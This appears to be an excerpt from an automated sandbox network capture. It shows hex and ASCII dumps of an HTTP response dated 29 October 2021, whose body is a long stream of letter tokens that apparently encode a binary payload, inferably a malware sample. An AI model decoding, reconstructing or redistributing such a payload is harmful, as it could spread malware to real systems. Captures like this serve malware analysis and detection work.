                                                                                                                          2021-10-29 15:06:45 UTC1255INData Raw: 6b 50 73 4c 4f 57 42 6c 7a 55 2d 6c 6c 20 55 6b 20 50 4f 4f 20 6b 20 4c 20 6b 20 6b 20 6b 20 4f 20 6b 20 6b 20 6b 20 73 57 57 20 73 57 57 20 6b 20 6b 20 50 7a 4f 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 42 4f 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 50 73 7a 20 6b 20 6b 20 6b 20 50 4f 20 4c 50 20 50 7a 42 20 50 4f 20 6b 20 50 7a 6b 20 55 20 73 6b 57 20 4c 4c 20 50 7a 4f 20 50 20 6c 42 20 73 6b 57 20 4c 4c 20 7a 4f 20 50 6b 4f 20 50 6b 57 20 50 50 57 20 4c 73 20 50 50 73 20 50 50 4f 20 50 50 50 20 50 6b 4c 20 50 50 4f 20 55 6c 20 50 6b 55 20 4c 73 20 55 55 20 55 6c 20 50 50 6b 20 50
                                                                                                                          Data Ascii: kPsLOWBlzU-ll Uk POO k L k k k O k k k sWW sWW k k PzO k k k k k k k BO k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k Psz k k k PO LP PzB PO k Pzk U skW LL PzO P lB skW LL zO PkO PkW PPW Ls PPs PPO PPP PkL PPO Ul PkU Ls UU Ul PPk P
                                                                                                                          2021-10-29 15:06:45 UTC1256INData Raw: 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 73 57 20 4f 6b 20 73 73 55 20 50 6b 55 20 50 50 57 20 57 6b 20 4f 7a 20 57 6b 20 57 6b 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 4f 42 20 50 4f 4c 20 57 6b 20 4f 7a 20 50 4c 7a 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 50 50 73 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20
                                                                                                                          Data Ascii: k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k sW Ok ssU PkU PPW Wk Oz Wk Wk zO PPO PPl POB POL Wk Oz PLz WO zO PPO PPl PkU PPs Wk PPs Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO
                                                                                                                          2021-10-29 15:06:45 UTC1258INData Raw: 73 20 57 6b 20 50 57 73 20 50 7a 4c 20 57 57 20 7a 4f 20 50 50 4f 20 7a 57 20 50 6b 55 20 50 50 73 20 57 6b 20 50 7a 4f 20 57 50 20 57 4f 20 7a 4f 20 50 50 7a 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 50 7a 20 57 4f 20 7a 4f 20 50 7a 20 55 50 20 4c 50 20 4c 20 42 4f 20 7a 4c 20 57 6b 20 57 4f 20 7a 4f 20 50 6c 7a 20 50 50 7a 20 50 6b 55 20 50 50 73 20 57 6b 20 73 4f 6b 20 57 50 20 57 4f 20 7a 4f 20 50 50 7a 20 50 50 6c 20 50 6b 55 20 50 50 73 20 50 55 6b 20 4f 55 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 57 4c 20 50 6b 55 20 50 50 73 20 50 50 4f 20 4c 6b 20
                                                                                                                          Data Ascii: s Wk PWs PzL WW zO PPO zW PkU PPs Wk PzO WP WO zO PPz PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Pz WO zO Pz UP LP L BO zL Wk WO zO Plz PPz PkU PPs Wk sOk WP WO zO PPz PPl PkU PPs PUk OU Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO WL PkU PPs PPO Lk
                                                                                                                          2021-10-29 15:06:45 UTC1259INData Raw: 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f
                                                                                                                          Data Ascii: z Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO
                                                                                                                          2021-10-29 15:06:45 UTC1260INData Raw: 55 20 4c 6c 20 4f 6c 20 73 50 6c 20 4f 73 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 73 4c 20 4c 7a 20 42 4f 20 57 57 20 7a 4f 20 50 50 4f 20 57 20 4c 50 20 4f 50 20 57 6b 20 4f 7a 20 42 42 20 6c 73 20 6c 4f 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 7a 7a 20 4f 57 20 4f 7a 20 57 6b 20 42 6b 20 73 4f 42 20 7a 6c 20 55 7a 20 4c 50 20 50 20 57 6b 20 4f 7a 20 42 42 20 42 7a 20 73 57 50 20 50 50 4f 20 50 50 6c 20 73 55 20 50 4f 20 4f 4f 20 4f 7a 20 57 6b 20 42 6b 20 50 73 4f 20 50 6b 55 20 50 50 6c 20 50 6b 55 20 50 73 73 20 50 4f 4f 20 73 50 20 4f 73 20 42 7a 20 50 4f 6c 20 50 50 4f 20 50 50 6c 20 73 55 20 73 20 57 4c 20 4f 55 20 57 6b 20 6c 6b 20 4f 73 20 50 6b 7a 20 50 50 6c 20 50 6b 55 20 50 73 73 20 73 42 20 4f 6c 20 57 6b 20 57 4f 20 55 4f 20 73 6b 7a 20 55 4c
                                                                                                                          Data Ascii: U Ll Ol sPl Os PPl PkU PPL sL Lz BO WW zO PPO W LP OP Wk Oz BB ls lO PPO PPl PkL zz OW Oz Wk Bk sOB zl Uz LP P Wk Oz BB Bz sWP PPO PPl sU PO OO Oz Wk Bk PsO PkU PPl PkU Pss POO sP Os Bz POl PPO PPl sU s WL OU Wk lk Os Pkz PPl PkU Pss sB Ol Wk WO UO skz UL
                                                                                                                          2021-10-29 15:06:45 UTC1262INData Raw: 4f 20 50 50 4c 20 42 55 20 50 50 4f 20 57 6b 20 4f 7a 20 73 57 20 7a 55 20 50 50 73 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 55 6c 20 57 57 20 4c 4c 20 57 4f 20 73 6b 6b 20 7a 73 20 50 42 4f 20 50 50 42 20 50 6b 55 20 50 50 7a 20 42 57 20 4c 6b 20 57 6b 20 57 4f 20 55 4f 20 50 73 20 50 4c 55 20 50 6b 55 20 50 50 73 20 57 4f 20 73 50 20 4c 50 20 4c 4c 20 50 50 4f 20 50 73 20 50 4f 73 20 50 6b 55 20 50 50 73 20 57 4f 20 73 6b 42 20 57 73 20 73 4c 57 20 7a 57 20 50 50 4f 20 50 50 57 20 4c 6b 20 55 57 20 57 6b 20 4f 7a 20 57 42 20 50 55 20 73 50 73 20 50 4f 6b 20 50 50 6c 20 50 6b 55 20 50 50 42 20 73 42 20 57 50 20 57 6b 20 57 4f 20 50 73 6c 20 73 55 20 55 57 20 50 6b 7a 20 50 50 73 20 57 73 20 4c 4c 20 57 57 20 4c 55 20 7a 6b 20 50 4f 6b 20 50 50 57 20 50 7a
                                                                                                                          Data Ascii: O PPL BU PPO Wk Oz sW zU PPs PPW PPl Pkl Ul WW LL WO skk zs PBO PPB PkU PPz BW Lk Wk WO UO Ps PLU PkU PPs WO sP LP LL PPO Ps POs PkU PPs WO skB Ws sLW zW PPO PPW Lk UW Wk Oz WB PU sPs POk PPl PkU PPB sB WP Wk WO Psl sU UW Pkz PPs Ws LL WW LU zk POk PPW Pz
                                                                                                                          2021-10-29 15:06:45 UTC1263INData Raw: 7a 20 57 6b 20 57 4f 20 55 4f 20 55 6b 20 6c 42 20 50 6b 55 20 50 50 73 20 57 42 20 57 55 20 57 4c 20 4c 6b 20 50 50 6b 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 55 4c 20 57 4c 20 57 4f 20 42 4c 20 73 4c 57 20 50 73 6c 20 50 50 57 20 50 50 6c 20 50 6b 55 20 50 50 4f 20 73 42 20 57 42 20 57 6b 20 57 4f 20 7a 73 20 50 73 42 20 50 50 4f 20 4c 6b 20 73 50 55 20 57 6b 20 4f 7a 20 57 73 20 4c 6c 20 7a 6b 20 55 55 20 50 50 4c 20 50 50 4c 20 73 57 4c 20 50 6b 4f 20 4f 7a 20 57 6b 20 57 57 20 50 50 4c 20 50 42 73 20 73 73 73 20 50 6b 55 20 50 50 73 20 57 4f 20 73 4f 20 57 20 57 4f 20 7a 4f 20 50 73 6b 20 42 20 7a 57 20 50 50 73 20 57 6b 20 57 7a 20 55 4c 20 50 4c 57 20 7a 4f 20 50 50 4f 20 50 50 57 20 6c 57 20 50 6b 73 20 4c 4c 20 57 4c 20 50 6b 20 73 4c 4f 20 7a 4f
                                                                                                                          Data Ascii: z Wk WO UO Uk lB PkU PPs WB WU WL Lk PPk PPO PPl PkL UL WL WO BL sLW Psl PPW PPl PkU PPO sB WB Wk WO zs PsB PPO Lk sPU Wk Oz Ws Ll zk UU PPL PPL sWL PkO Oz Wk WW PPL PBs sss PkU PPs WO sO W WO zO Psk B zW PPs Wk Wz UL PLW zO PPO PPW lW Pks LL WL Pk sLO zO
                                                                                                                          2021-10-29 15:06:45 UTC1264INData Raw: 4f 20 7a 4f 20 50 50 4f 20 4c 7a 20 50 6b 7a 20 50 50 73 20 57 6b 20 50 6b 57 20 57 50 20 57 4f 20 7a 4f 20 50 50 4c 20 50 50 6c 20 50 6b 55 20 50 50 73 20 42 50 20 4f 7a 20 57 6b 20 57 57 20 6c 55 20 42 42 20 50 50 57 20 50 6b 55 20 57 73 20 4f 7a 20 4f 7a 20 57 6b 20 57 4c 20 7a 4f 20 50 50 4f 20 50 6b 6b 20 4c 6b 20 6c 55 20 57 6b 20 4f 7a 20 57 42 20 42 6b 20 7a 42 20 50 50 50 20 73 4f 7a 20 57 57 20 50 50 73 20 57 6b 20 4f 55 20 73 4c 20 73 4c 6b 20 50 4f 6b 20 50 50 4f 20 50 50 6c 20 50 6b 57 20 7a 7a 20 57 20 4f 7a 20 57 6b 20 42 6b 20 4c 55 20 6c 4f 20 50 50 6c 20 50 6b 55 20 50 73 73 20 73 42 20 55 20 57 6b 20 57 4f 20 55 4f 20 50 73 50 20 50 50 4f 20 42 55 20 6c 4f 20 57 6b 20 4f 7a 20 57 42 20 73 6c 20 7a 4c 20 50 50 42 20 50 73 6b 20 50 6c 42
                                                                                                                          Data Ascii: O zO PPO Lz Pkz PPs Wk PkW WP WO zO PPL PPl PkU PPs BP Oz Wk WW lU BB PPW PkU Ws Oz Oz Wk WL zO PPO Pkk Lk lU Wk Oz WB Bk zB PPP sOz WW PPs Wk OU sL sLk POk PPO PPl PkW zz W Oz Wk Bk LU lO PPl PkU Pss sB U Wk WO UO PsP PPO BU lO Wk Oz WB sl zL PPB Psk PlB
                                                                                                                          2021-10-29 15:06:45 UTC1266INData Raw: 50 6b 7a 20 7a 57 20 73 73 42 20 73 50 4f 20 57 6b 20 57 4f 20 7a 6b 20 55 6b 20 42 42 20 50 6b 55 20 50 50 73 20 57 42 20 42 6c 20 50 6b 20 57 4f 20 7a 4f 20 50 73 6b 20 73 42 20 50 55 4c 20 50 50 73 20 57 6b 20 57 4f 20 55 4c 20 50 4c 20 7a 4f 20 50 50 4f 20 50 73 6c 20 73 20 6c 73 20 57 50 20 4f 7a 20 57 73 20 4c 55 20 7a 4c 20 55 55 20 50 50 4c 20 50 73 4f 20 50 50 6c 20 4f 57 20 42 4c 20 50 55 50 20 50 6b 7a 20 7a 4f 20 50 50 4f 20 50 50 42 20 6c 73 20 50 42 6b 20 50 57 57 20 4f 7a 20 57 6b 20 57 6b 20 50 73 4f 20 42 55 20 50 50 6c 20 50 6b 55 20 50 73 73 20 42 57 20 7a 20 57 6b 20 57 4f 20 55 4f 20 73 55 20 73 50 6c 20 50 6b 55 20 50 50 73 20 57 73 20 57 42 20 73 42 20 4f 7a 20 7a 4f 20 50 50 4f 20 50 50 57 20 73 20 6c 4f 20 57 50 20 4f 7a 20 57 73
                                                                                                                          Data Ascii: Pkz zW ssB sPO Wk WO zk Uk BB PkU PPs WB Bl Pk WO zO Psk sB PUL PPs Wk WO UL PL zO PPO Psl s ls WP Oz Ws LU zL UU PPL PsO PPl OW BL PUP Pkz zO PPO PPB ls PBk PWW Oz Wk Wk PsO BU PPl PkU Pss BW z Wk WO UO sU sPl PkU PPs Ws WB sB Oz zO PPO PPW s lO WP Oz Ws
                                                                                                                          2021-10-29 15:06:45 UTC1267INData Raw: 50 50 4f 20 50 50 6c 20 50 6b 7a 20 7a 57 20 73 73 42 20 50 4c 73 20 57 6b 20 57 4f 20 7a 6b 20 55 6b 20 42 42 20 50 6b 55 20 50 50 73 20 57 42 20 42 6c 20 50 6b 20 57 4f 20 7a 4f 20 50 73 6b 20 73 42 20 50 55 4c 20 50 50 73 20 57 6b 20 57 4f 20 55 4c 20 50 4c 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 73 42 20 50 50 55 20 4c 57 20 57 57 20 4f 4c 20 50 7a 6c 20 50 4f 20 50 50 4f 20 50 50 6c 20 50 6b 7a 20 7a 57 20 73 73 42 20 50 57 55 20 57 6b 20 57 4f 20 7a 6b 20 55 6b 20 42 42 20 50 6b 55 20 50 50 73 20 57 42 20 42 6c 20 50 6b 20 57 4f 20 7a 4f 20 50 73 6b 20 73 42 20 4f 57 20 50 50 73 20 57 6b 20 57 7a 20 4c 50 20 4f 50 20 42 55 20 50 50 6c 20 50 6b 7a 20 73 73 4f 20 4f 73 20 57 6b 20 4f 7a 20 57 50 20 50 55 20 50 4c 73 20 50 4f 4f 20 50 50 6c 20 50 6b 55
                                                                                                                          Data Ascii: PPO PPl Pkz zW ssB PLs Wk WO zk Uk BB PkU PPs WB Bl Pk WO zO Psk sB PUL PPs Wk WO UL PL zO PPO Psl PsB PPU LW WW OL Pzl PO PPO PPl Pkz zW ssB PWU Wk WO zk Uk BB PkU PPs WB Bl Pk WO zO Psk sB OW PPs Wk Wz LP OP BU PPl Pkz ssO Os Wk Oz WP PU PLs POO PPl PkU
                                                                                                                          2021-10-29 15:06:45 UTC1268INData Raw: 50 57 20 50 50 6c 20 50 6b 55 20 50 6b 6b 20 4c 4c 20 57 4f 20 4c 57 20 57 6b 20 42 55 20 50 50 55 20 50 6b 42 20 50 73 6b 20 73 57 4c 20 50 6b 4f 20 4f 7a 20 57 6b 20 57 57 20 50 50 4c 20 50 42 73 20 50 57 6c 20 50 6b 55 20 50 50 73 20 57 4f 20 73 4f 20 57 20 57 4f 20 7a 4f 20 50 73 6b 20 42 20 7a 57 20 50 50 73 20 57 6b 20 57 7a 20 55 4c 20 50 57 4f 20 7a 4f 20 50 50 4f 20 50 50 57 20 50 6b 50 20 7a 7a 20 57 73 20 4f 7a 20 57 6b 20 4f 7a 20 4c 7a 20 50 20 50 50 55 20 50 6b 55 20 6b 20 6c 42 20 4f 42 20 57 6b 20 57 4f 20 55 4f 20 73 55 20 50 6b 42 20 50 6b 55 20 50 50 73 20 57 42 20 4c 57 20 57 4c 20 42 55 20 50 42 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 55 55 20 57 7a 20 4c 4c 20 57 7a 20 4c 55 20 7a 6b 20 55 55 20 50 50 73 20 50 50 4f 20 50 73 4f 20 50
                                                                                                                          Data Ascii: PW PPl PkU Pkk LL WO LW Wk BU PPU PkB Psk sWL PkO Oz Wk WW PPL PBs PWl PkU PPs WO sO W WO zO Psk B zW PPs Wk Wz UL PWO zO PPO PPW PkP zz Ws Oz Wk Oz Lz P PPU PkU k lB OB Wk WO UO sU PkB PkU PPs WB LW WL BU PB PPW PPl Pkl UU Wz LL Wz LU zk UU PPs PPO PsO P
                                                                                                                          2021-10-29 15:06:45 UTC1270INData Raw: 50 73 6c 20 50 50 4f 20 42 20 50 20 4f 73 20 4f 7a 20 4c 4c 20 57 55 20 7a 57 20 50 50 6c 20 50 6b 55 20 50 73 73 20 4f 57 20 50 20 50 20 57 6c 20 7a 6c 20 55 6b 20 42 73 20 50 6b 55 20 50 50 73 20 57 42 20 57 6b 20 73 42 20 4f 6b 20 7a 4f 20 50 50 4f 20 50 50 57 20 50 6b 4c 20 55 50 20 42 6b 20 57 6b 20 4c 42 20 4c 4f 20 50 73 4f 20 7a 4f 20 50 50 6c 20 50 6b 55 20 50 50 7a 20 55 4c 20 50 50 20 57 6b 20 57 4f 20 55 4f 20 50 73 6b 20 50 6c 50 20 50 50 6b 20 7a 42 20 73 4c 42 20 4f 7a 20 57 73 20 73 7a 20 7a 57 20 55 7a 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 57 4f 20 57 6b 20 4c 20 50 50 50 20 50 50 4f 20 50 50 7a 20 55 7a 20 50 50 73 20 57 6b 20 4f 55 20 4c 4c 20 42 20 7a 42 20 50 50 4f 20 7a 73 20 50 6b 55 20 50 50 73 20 57 6b 20 57 57 20 57 6b
                                                                                                                          Data Ascii: Psl PPO B P Os Oz LL WU zW PPl PkU Pss OW P P Wl zl Uk Bs PkU PPs WB Wk sB Ok zO PPO PPW PkL UP Bk Wk LB LO PsO zO PPl PkU PPz UL PP Wk WO UO Psk PlP PPk zB sLB Oz Ws sz zW Uz PPl PkU PPs Wk WO Wk L PPP PPO PPz Uz PPs Wk OU LL B zB PPO zs PkU PPs Wk WW Wk
                                                                                                                          2021-10-29 15:06:45 UTC1271INData Raw: 50 73 20 57 6b 20 73 6c 20 55 4c 20 73 4f 7a 20 7a 57 20 50 50 4f 20 50 50 57 20 73 20 50 42 50 20 57 50 20 4f 7a 20 57 73 20 42 6b 20 50 4c 7a 20 50 50 4c 20 7a 4c 20 50 6c 55 20 50 50 73 20 73 4c 42 20 57 50 20 73 6b 20 73 4c 73 20 7a 4f 20 50 50 42 20 55 57 20 50 6b 55 20 50 50 73 20 57 6b 20 50 50 4c 20 42 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6c 20 4f 55 20 57 6b 20 57 4f 20 6c 42 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 7a 4c 20 57 50 20 4f 7a 20 57 6b 20 57 4c 20 7a 4f 20 50 50 4f 20 50 50 6c 20 55 7a 20 50 50 73 20 57 6b 20 4f 55 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 73 50 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 4f 20 57 50 20 57 4f 20 7a 4f 20 55 6b 20 50 50 42 20 50 6b 55 20 50 50 73 20 4f 55 20 4f 7a 20 57
                                                                                                                          Data Ascii: Ps Wk sl UL sOz zW PPO PPW s PBP WP Oz Ws Bk PLz PPL zL PlU PPs sLB WP sk sLs zO PPB UW PkU PPs Wk PPL B WO zO PPO PPl PkU PPs Wl OU Wk WO lB PPO PPl PkU zL WP Oz Wk WL zO PPO PPl Uz PPs Wk OU Wk WO zO PPO PsP PkU PPs Wk OO WP WO zO Uk PPB PkU PPs OU Oz W
                                                                                                                          2021-10-29 15:06:45 UTC1272INData Raw: 50 50 4f 20 55 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 73 20 50 50 4f 20 73 4f 55 20 73 57 57 20 50 50 73 20 4f 55 20 57 7a 20 57 6b 20 57 4f 20 7a 57 20 50 6b 57 20 42 55 20 50 6b 57 20 50 50 73 20 50 50 4f 20 4f 55 20 57 6b 20 57 4f 20 55 57 20 50 50 4f 20 50 50 6c 20 50 73 4f 20 4c 20 50 73 50 20 4f 55 20 57 6b 20 4f 7a 20 55 4f 20 50 50 73 20 73 42 20 57 73 20 50 50 73 20 57 6b 20 57 7a 20 55 4c 20 50 6b 55 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 6b 73 20 6c 73 20 50 4f 57 20 4f 7a 20 57 6b 20 57 4f 20 7a 4c 20 73 55 20 50 73 73 20 50 6b 55 20 50 50 73 20 57 42 20 42 7a 20 4c 6c 20 57 4f 20 7a 4f 20 50 50 57 20 50 73 50 20 50 6b 50 20 4c 50 20 50 50 6b 20 4f 7a 20 57 6b 20 42 6b 20 4c 7a 20 73 4f 6c 20 50 50 55 20 50 6b 55
                                                                                                                          Data Ascii: PPO Ul PkU PPs Wk Oz Wk WO zs PPO sOU sWW PPs OU Wz Wk WO zW PkW BU PkW PPs PPO OU Wk WO UW PPO PPl PsO L PsP OU Wk Oz UO PPs sB Ws PPs Wk Wz UL PkU zO PPO Psl Pks ls POW Oz Wk WO zL sU Pss PkU PPs WB Bz Ll WO zO PPW PsP PkP LP PPk Oz Wk Bk Lz sOl PPU PkU
                                                                                                                          2021-10-29 15:06:45 UTC1274INData Raw: 20 50 50 73 20 4c 57 20 42 6c 20 4f 4c 20 57 4f 20 7a 4f 20 50 73 6b 20 50 73 6c 20 50 50 50 20 50 4f 20 4f 7a 20 4f 55 20 57 6b 20 57 6b 20 50 50 4c 20 55 57 20 55 7a 20 6c 57 20 50 4f 20 57 50 20 4f 55 20 57 6b 20 57 6b 20 50 6c 6b 20 50 50 42 20 50 57 50 20 50 6b 7a 20 50 50 73 20 57 73 20 42 6c 20 4f 6b 20 57 4f 20 7a 4f 20 50 73 6b 20 7a 6b 20 73 4c 6c 20 50 50 4f 20 57 50 20 4f 7a 20 57 4f 20 4c 6b 20 7a 57 20 50 50 4f 20 50 50 6c 20 6c 6b 20 4c 50 20 4f 42 20 4f 7a 20 57 6b 20 42 6b 20 55 57 20 6c 4f 20 42 4f 20 50 6b 7a 20 50 50 73 20 57 6b 20 57 57 20 55 4c 20 4f 4c 20 7a 4f 20 50 50 4f 20 50 73 6c 20 55 6c 20 50 73 6b 20 4f 73 20 4c 55 20 4c 6c 20 50 7a 6c 20 50 73 20 50 50 4f 20 50 50 6c 20 50 6b 7a 20 7a 57 20 4c 42 20 4f 6c 20 4f 73 20 50 7a
                                                                                                                          Data Ascii: PPs LW Bl OL WO zO Psk Psl PPP PO Oz OU Wk Wk PPL UW Uz lW PO WP OU Wk Wk Plk PPB PWP Pkz PPs Ws Bl Ok WO zO Psk zk sLl PPO WP Oz WO Lk zW PPO PPl lk LP OB Oz Wk Bk UW lO BO Pkz PPs Wk WW UL OL zO PPO Psl Ul Psk Os LU Ll Pzl Ps PPO PPl Pkz zW LB Ol Os Pz
                                                                                                                          2021-10-29 15:06:45 UTC1275INData Raw: 20 50 4c 7a 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 4f 6b 20 57 50 20 4f 7a 20 57 6b 20 57 42 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 6c 73 20 50 6b 55 20 50 50 73 20 57 6b 20 73 6c 20 57 50 20 57 4f 20 7a 4f 20 73 42 20 50 50 42 20 50 6b 55 20 50 50 73 20 4f 55 20 4f 7a 20 57 6b 20 57 4f 20 55 4f 20 50 50 4f 20 50 50 6c 20 50 6b 7a 20 50 50 4f 20 57 6b 20 4f 7a 20 57 6b 20 6c 20 7a 4f 20 50 50 4f 20 50 50 6c 20 4f 73 20 50 50 4c 20 57 6b 20 4f 7a 20 6c 4f 20 57 57 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 73 20 4f 7a 20 57 6b 20 57 4f 20 4f 73 20 50 50 57 20 50 50 6c
                                                                                                                          Data Ascii: PLz PPO PPl PkU Ok WP Oz Wk WB zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO ls PkU PPs Wk sl WP WO zO sB PPB PkU PPs OU Oz Wk WO UO PPO PPl Pkz PPO Wk Oz Wk l zO PPO PPl Os PPL Wk Oz lO WW zO PPO Psl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Ws Oz Wk WO Os PPW PPl
                                                                                                                          2021-10-29 15:06:45 UTC1276INData Raw: 20 55 6b 20 42 42 20 50 6b 55 20 50 50 73 20 57 42 20 42 6c 20 50 6b 20 57 4f 20 7a 4f 20 50 73 6b 20 73 42 20 50 55 4c 20 50 50 73 20 57 6b 20 57 4f 20 55 4c 20 50 4c 20 7a 4f 20 50 50 4f 20 50 73 6c 20 42 55 20 4f 55 20 57 6b 20 4f 7a 20 57 42 20 7a 55 20 55 7a 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 55 6c 20 57 73 20 57 42 20 4c 57 20 57 6b 20 6c 7a 20 73 57 57 20 4f 6c 20 50 6b 55 20 50 50 73 20 57 50 20 73 50 20 73 73 42 20 73 6b 7a 20 7a 4f 20 50 50 4f 20 50 50 4c 20 42 55 20 6c 50 20 57 6b 20 4f 7a 20 57 42 20 42 55 20 50 6b 7a 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 4c 50 20 50 57 7a 20 4f 7a 20 57 6b 20 4f 7a 20 57 55 20 6c 4c 20 50 50 6c 20 50 6b 55 20 50 73 73 20 55 4c 20 7a 20 57 50 20 57 4f 20 7a 73 20 55 55 20 50 50 57 20 50 6b 50 20 55 6c 20
                                                                                                                          Data Ascii: Uk BB PkU PPs WB Bl Pk WO zO Psk sB PUL PPs Wk WO UL PL zO PPO Psl BU OU Wk Oz WB zU Uz PPW PPl Pkl Ul Ws WB LW Wk lz sWW Ol PkU PPs WP sP ssB skz zO PPO PPL BU lP Wk Oz WB BU Pkz PPO PPl PkL LP PWz Oz Wk Oz WU lL PPl PkU Pss UL z WP WO zs UU PPW PkP Ul
                                                                                                                          2021-10-29 15:06:45 UTC1278INData Raw: 20 57 4f 20 7a 4f 20 50 73 6b 20 73 42 20 50 50 4f 20 50 50 73 20 57 6b 20 57 7a 20 4c 4f 20 57 4f 20 7a 42 20 50 6b 50 20 73 4f 7a 20 57 57 20 50 50 73 20 57 6b 20 4f 55 20 73 4c 20 4c 73 20 6c 57 20 4f 42 20 73 4c 73 20 50 73 73 20 4c 50 20 7a 57 20 4f 7a 20 57 6b 20 42 6b 20 55 57 20 50 50 6c 20 50 6b 55 20 73 4f 6c 20 50 50 6b 20 50 55 50 20 50 6b 42 20 57 6b 20 57 4f 20 7a 57 20 7a 6c 20 50 42 57 20 73 4f 4c 20 50 50 73 20 57 6b 20 57 73 20 73 42 20 50 20 7a 4f 20 50 50 4f 20 50 73 6c 20 4c 6b 20 6c 73 20 57 6b 20 4f 7a 20 57 42 20 4c 6b 20 55 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 55 73 20 57 73 20 57 57 20 4c 6c 20 50 6c 73 20 55 4f 20 7a 55 20 50 50 4c 20 50 6b 42 20 50 6b 73 20 50 42 7a 20 57 7a 20 73 4c 42 20 57 4c 20 50 50 4f 20 50 6c 73 20 50
                                                                                                                          Data Ascii: WO zO Psk sB PPO PPs Wk Wz LO WO zB PkP sOz WW PPs Wk OU sL Ls lW OB sLs Pss LP zW Oz Wk Bk UW PPl PkU sOl PPk PUP PkB Wk WO zW zl PBW sOL PPs Wk Ws sB P zO PPO Psl Lk ls Wk Oz WB Lk U PPO PPl PkL Us Ws WW Ll Pls UO zU PPL PkB Pks PBz Wz sLB WL PPO Pls P
